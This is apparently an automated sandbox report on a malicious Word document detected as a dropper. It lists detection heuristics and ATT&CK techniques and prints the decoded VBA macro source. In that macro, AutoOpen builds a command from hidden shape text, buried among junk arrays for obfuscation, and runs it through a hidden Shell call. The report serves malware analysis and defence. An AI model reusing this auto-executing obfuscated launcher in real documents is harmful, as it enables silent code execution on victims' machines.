MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. This is further supported by a high severity SC_STR_CMD heuristic indicating suspicious cmd.exe invocation. The embedded document body contains a heavily obfuscated command line that attempts to construct and execute further commands, likely for downloading and executing a second-stage payload. The ClamAV detection also points to a dropper functionality.
Heuristics 7
-
ClamAV: Doc.Dropper.Powmet-6751168-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Powmet-6751168-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
"Qq", "tH", "Q", "Cw", "k", "Pl", "ul", "KW") Shell iFnjB + hHvRznHm + wjBNQjw, 0 ratQN = Array("Fi", "Gm", "iq", "h", "h", "jc", "i", "z", _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() vOPft = Array("i", "L", "HF", "V", "Bz", "wf", "a", "SP", _ -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5752 bytes |
SHA-256: 25fa8483c5d7d5e6769fc5930b97362c414b8d1780d975911197ce55c46686d7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vGnocljVO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TrlDLwaOoE()
Qjuij = Array("U", "P", "O", "kZ", "I", "TO", "v", "z", _
"z", "rd", "P", "wl", "q", "T", "G", "Tc", _
"wO", "YA", "wM", "hY", "w", "al", "Rq", "AO", _
"O", "iO", "IN", "wT", "AF", "V", "uN", "z", _
"N", "sW", "lU", "d", "ki", "Ws", "U", "D", _
"wc", "Rk", "Y", "b", "jz", "C", "h", "rv", _
"s", "S", "vS", "p", "YZ", "z", "Q", "Ka", _
"XM", "m", "un", "v", "L", "dN", "ti", "z")
wYFOS = Array("O", "E", "lf", "zp", "M", "Mf", "z", "cS", _
"DP", "mY", "u", "p", "F", "AK", "u", "ki", _
"l", "P", "wl", "ri", "zc", "mz", "rS", "j", _
"QJ", "HW", "CQ", "Rp", "Iv", "zC", "nY", "m", _
"Fc", "OM", "C", "j", "ZV", "d", "b", "bb", _
"hH", "nq", "A", "iO", "h", "Tj", "cW", "Ad", _
"G", "i", "sV", "Mn", "bn", "z", "FY", "P", _
"j", "k", "rh", "oz", "lb", "d", "b", "Q")
wzjii = Array("N", "j", "Zz", "b", "ZQ", "n", "z", "t", _
"a", "J", "rX", "kI", "Tm", "bW", "zl", "wX", _
"o", "X", "Ki", "sD", "FZ", "Z", "X", "L", _
"po", "I", "pp", "HS", "P", "mF", "w", "z", _
"E", "Q", "f", "KT", "Vc", "i", "h", "RF", _
"EV", "TZ", "YK", "CF", "F", "w", "jY", "dH", _
"Vu", "qw", "tE", "Cr", "ss", "o", "jG", "X", _
"q", "X", "jK", "H", "b", "az", "hj", "rR")
iFnjB = "" + RaNFq + jWwjkPV + Shapes("XhLAMoZGJWJTT").TextFrame.ContainingRange + riLXuN + ASizV
qYclZqVOP = Array("cq", "t", "Q", "P", "s", "dK", "AR", "pR", _
"v", "Ls", "Z", "Pk", "fi", "F", "h", "P", _
"E", "vk", "HM", "C", "IH", "zs", "s", "Wl", _
"Vn", "hM", "T", "M", "A", "j", "t", "zO", _
"vK", "ib", "zl", "D", "D", "iN", "qP", "k", _
"s", "p", "H", "zk", "Bt", "m", "kd", "E", _
"NR", "A", "PH", "Sd", "k", "df", "A", "M", _
"v", "AS", "b", "Go", "Gh", "F", "n", "Jw")
hpJmk = Array("GJ", "V", "Mn", "w", "wM", "Vf", "pd", "Gn", _
"q", "EY", "I", "Jw", "T", "vw", "K", "w", _
"Rk", "M", "LZ", "E", "f", "dt", "SP", "J", _
"iZ", "iW", "vZ", "Si", "w", "V", "Ul", "M", _
"iv", "S", "pp", "i", "tu", "D", "wr", "wQ", _
"q", "VG", "FX", "wi", "z", "w", "fM", "CG", _
"F", "k", "wU", "pc", "Ow", "sI", "Mt", "RL", _
"Qq", "tH", "Q", "Cw", "k", "Pl", "ul", "KW")
Shell iFnjB + hHvRznHm + wjBNQjw, 0
ratQN = Array("Fi", "Gm", "iq", "h", "h", "jc", "i", "z", _
"d", "J", "O", "J", "z", "h", "US", "f", _
"iG", "rt", "ji", "Hm", "mv", "QJ", "j", "Z", _
"Ri", "r", "Ak", "i", "w", "w", "F", "k", _
"ab", "N", "n", "U", "RK", "l", "N", "oQ", _
"Cu", "tf", "Xl", "z", "Lz", "t", "zW", "H", _
"iW", "T", "T", "pF", "P", "hh", "rh", "lw", _
"t", "S", "N", "rI", "U", "IE", "Y", "ad")
PEuXMOli = Array("z", "rl", "lw", "F", "Vk", "z", "Iz", "XS", _
"cC", "z", "z", "z", "wz", "wC", "to", "Vk", _
"TK", "C", "HT", "P", "N", "U", "s", "oj", _
"hU", "k", "p", "u", "PJ", "Ch", "Jr", "u", _
"s", "ki", "j", "ch", "K", "Nj", "b", "Z", _
"NT", "p", "Gd", "i", "KB", "tP", "mj", "Ln", _
"z", "a", "J", "Ti", "B", "i", "zf", "l", _
"v", "E", "XC", "Fw", "Qr", "Np", "W", "Pu")
End Function
Sub AutoOpen()
vOPft = Array("i", "L", "HF", "V", "Bz", "wf", "a", "SP", _
"N", "WE", "iE", "X", "Ya", "aL", "L", "MI", _
"P", "R", "G", "l", "U", "zQ", "wn", "Gk", _
"B", "wI", "Zp", "T", "P", "FH", "w", "Fm", _
"LS", "C", "b", "E", "YZ", "w", "GK", "s", _
"tR", "Rz", "j", "Io", "tc", "B", "i", "vw", _
"P", "tv", "Jw", "A", "hB", "s", "L", "O", _
"Zj", "Q", "iw", "zZ", "h", "u", "ih", "W")
NrGtWj = Array("fm", "l", "OA", "DX", "kG", "B", "du", "o", _
"l", "pl", "z", "N", "w", "Ff", "f", "A", _
"u", "a", "va", "Ou", "t", "zE", "Ju", "PA", _
"Q", "if", "Rf", "HV", "dr", "b", "wv", "A", _
"CL", "v", "aK", "T", "vA", "dj", "IU", "G", _
"nq", "z", "h", "O", "AA", "iN", "N", "dr", _
"E", "lr", "Nt", "Cq", "Fu", "P", "P", "os", _
"HX", "vB", "QR", "Yr", "l", "wF", "X", "oa")
HPYIlrm = Array("hw", "T", "DS", "a", "dr", "vf", "zM", "zV", _
"Ou", "A", "qG", "R", "LO", "E", "Uc", "Nj", _
"Oj", "qL", "hL", "L", "Lk", "Nu", "Fb", "H", _
"l", "Wn", "Ac", "jj", "AA", "c", "m", "Z", _
"s", "WD", "X", "Zn", "mj", "zw", "U", "J", _
"ip", "EW", "hC", "f", "V", "zW", "J", "P", _
"Y", "w", "zJ", "B", "M", "Ow", "ZD", "R", _
"mp", "H", "W", "E", "cu", "B", "H", "f")
TrlDLwaOoE
vjMAmo = Array("Gw", "j", "zN", "uN", "z", "vf", "JG", "jf", _
"B", "jK", "dN", "QJ", "Tu", "am", "iX", "Y", _
"li", "W", "s", "t", "HK", "vO", "XN", "jC", _
"rV", "A", "NW", "K", "X", "HA", "w", "N", _
"o", "P", "I", "C", "p", "U", "cW", "uM", _
"Vi", "hY", "zn", "oN", "ZA", "K", "Z", "AQ", _
"iA", "Hq", "u", "J", "o", "r", "qH", "fW", _
"S", "z", "oU", "R", "Y", "M", "i", "i")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.